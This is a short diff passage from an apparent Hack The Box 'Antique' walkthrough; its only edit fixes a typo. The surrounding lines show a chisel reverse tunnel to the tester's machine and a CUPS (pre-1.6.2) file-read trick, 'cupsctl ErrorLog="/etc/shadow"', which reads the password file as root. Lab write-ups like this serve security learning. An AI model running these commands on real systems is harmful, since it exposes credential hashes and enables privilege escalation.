lucabodd/htb-walkthroughs/Antique.md

 ```
 ./chisel client 10.10.14.28:8000 R:631:127.0.0.1:631
 ```
 Browsing to ``127.0.0.1:631`` on our machine shows CUPS administration page.
 CUPS versions less than 1.6.2 has a known local file read vulnerability.
 Navigate to Administration.
 Clicking on View Error Log shows the contents of error.log file.
 As CUPS server runs as root by default, arbitraty file read can be achieved by updating ErrorLog file path.
-Let's update the ErrorLog path usingcupsctl.
+Let's update the ErrorLog path using cupsctl.
 ```
 cupsctl ErrorLog="/etc/shadow"
 ```